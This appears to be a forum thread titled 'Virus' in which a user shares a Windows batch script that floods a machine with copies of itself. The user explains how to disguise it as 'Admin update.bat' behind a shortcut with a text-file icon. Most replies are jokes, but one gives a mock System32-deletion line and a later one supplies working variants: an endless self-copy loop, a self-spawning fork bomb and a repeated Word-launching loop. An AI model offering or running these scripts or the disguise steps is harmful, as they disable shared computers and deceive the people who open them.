167Views15Replies
Virus
I did this at school. Open notepad, copy and paste this, then save it as Admin update.bat & then when you've saved it, create a shortcut then hide the original file. After that, change the icon to the one that looks like the .txt file(i am not responsible for what you do with this):
@echo off
:1
set title=%random%
@echo off>%title%.bat
:1>%title%.bat
set title=%random%>%title%.bat
@echo off>%title%.bat>%title%.bat
:1>%title%.bat>%title%.bat
set title=%random%>%title%.bat>%title%.bat
goto 1>%title%.bat
goto 1
Laaaaaaaaaaaaaame.
Select as Best AnswerUndo Best Answer
*thanks Adrian Monk for stating the lame* *hugs*
Select as Best AnswerUndo Best Answer
*You're welcome, EthanGibson* ;)
Select as Best AnswerUndo Best Answer
*still can't get over calling you Lithium Rain instead, it'll take me a while*
Select as Best AnswerUndo Best Answer
(I've thought about changing my name to Molten Boron, then thought again...)
L
Select as Best AnswerUndo Best Answer
. "Nobody doesn't like Molten Boron!"
Select as Best AnswerUndo Best Answer
Exactly! L
Select as Best AnswerUndo Best Answer
But adding MB after your name will make you labeled as a nerd because people will think your the motherboard, which i may point out is a legit rap name.
Select as Best AnswerUndo Best Answer
I associate MB with the Milton Bradley company, not motherboards.
L
Select as Best AnswerUndo Best Answer
Then you will get sued for copyright, either way, not a good turn out.
Select as Best AnswerUndo Best Answer
*snort*
Select as Best AnswerUndo Best Answer
import os
print"Virus is not virus".
print"Virus is pointless."
print"Learn2code."
print"Learn2Virus."
print"Noob."
os.delete(C:\Windows\System32)
#Python is fun.
Select as Best AnswerUndo Best Answer
Now to be a real virus it just has to spread to other computers to... you know.... BE A VIRUS. You should have named it something else. I didnt want to be directed here.
Select as Best AnswerUndo Best Answer
What's it do?
Select as Best AnswerUndo Best Answer
supposed to be windows command screen app that floods the computer with copies of itself
i think it does not work though cause all lines except 1 2 3 and last have to start with echo
still the resulting files won't be the same
i think better variant is
:1
@copy %0 %random%.bat
@goto 1
or if you want to add forkbomb for extra fun
:1
@set title=%random%
@copy %0 %title%.bat
@start %title%.bat
@goto 1
or even more fun but less damage (fix the path if needed)
:1
@start c:\progra~1\micros~1\office\winword.exe
@goto 1
Select as Best AnswerUndo Best Answer